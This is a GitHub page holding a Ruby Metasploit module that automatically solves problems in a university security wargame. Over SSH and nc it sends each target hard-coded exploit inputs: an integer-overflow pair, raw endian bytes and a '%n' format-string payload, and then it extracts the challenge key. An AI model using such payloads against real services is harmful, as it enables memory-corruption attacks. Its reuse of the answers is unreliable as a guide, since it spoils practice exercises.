CSWarGame/problem.attack.rb at master · cyliang/CSWarGame · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
require 'io/console'
require 'msf/core'

class Metasploit3 < Msf::Auxiliary
	def initialize
		super(
			'Name' => 'CS Wargame Solver: attack',
			'Version' => '$Revision:$',
			'Description' => 'Get the key immediately by this module.',
			'Author' => ['Femi'],
			'Liciense' => MSF_LICENSE,
			'Reference' => []
		)

		register_options([
			OptAddress.new('WHOST', [
				true,
				'the workstation host',
				'wargame2.cs.nctu.edu.tw'
			]),
			OptInt.new('PROBLEM', [
				true,
				'the problem id',
				''
			]),
			OptAddress.new('THOST', [
				true,
				'the target host',
				''
			]),
			OptPort.new('TPORT', [
				true,
				'the target port',
				''
			]),
			OptString.new('ACCOUNT', [
				false,
				'the website account',
				''
			]),
			OptString.new('PASSWORD', [
				false,
				'the website password',
				''
			])
		], self.class)
	end

	def run
		whost = datastore['WHOST']
		thost = datastore['THOST']
		tport = datastore['TPORT']
		pid = datastore['PROBLEM']

		account = datastore['ACCOUNT']
		password = datastore['PASSWORD']
		if account.empty?
			print "Please enter your account: "
			account = gets.chomp!
		end
		if password.empty?
			print "Please enter your password: "
			password = STDIN.noecho(&:gets).chomp!
			puts ""
		end

		problems = {
			1 => [
				'Connect to server! easy start',
				"echo '#{account}'"
			],
			2 => [
				'[Basic] Integer Over Flow',
				"echo 2147478598; echo 2147478598"
			],
			3 => [
				'[Basic] endian?',
				"echo -e '\\01\\00\\00\\00\\00'"
			],
			6 => [
				'[Basic] endian with format string',
				"echo '%255d%1$n%n%n%n'"
			]
		}

		if !problems.has_key? pid
			puts "\e[1;31mInvalid problem id '#{pid}'."
			puts "Maybe this problem hasn't been implemented yet.\e[m"
			return
		end

		cmd = problems[pid][1]
		puts "Trying to solve the problem '#{problems[pid][0]}'"
		puts "Please wait for the result..."

		begin
			Net::SSH.start(whost, account, :password => password) do |ssh|
				ssh.exec!("{ #{cmd} ; } | nc -v #{thost} #{tport} | grep 'key: ' | cut -d ' ' -f 2") do |ch2, stream, data|
					if stream == :stdout
						puts "Your key is: \e[1;33m#{data}\e[m"
					end
					if stream == :stderr && data =~ /Connection refused/
						puts "\e[1;31mThe target port #{thost}:#{tport} is not opened."
						puts "Try click the \e[43mstart\e[m\e[1;31m or \e[43mrestart\e[m\e[1;31m button on the website.\e[m"
					end
				end
			end

		rescue Net::SSH::AuthenticationFailed
			puts "\e[1;31mFail to login #{whost}"
			puts "Your account or password may be wrong.\e[m"
		end
	end
end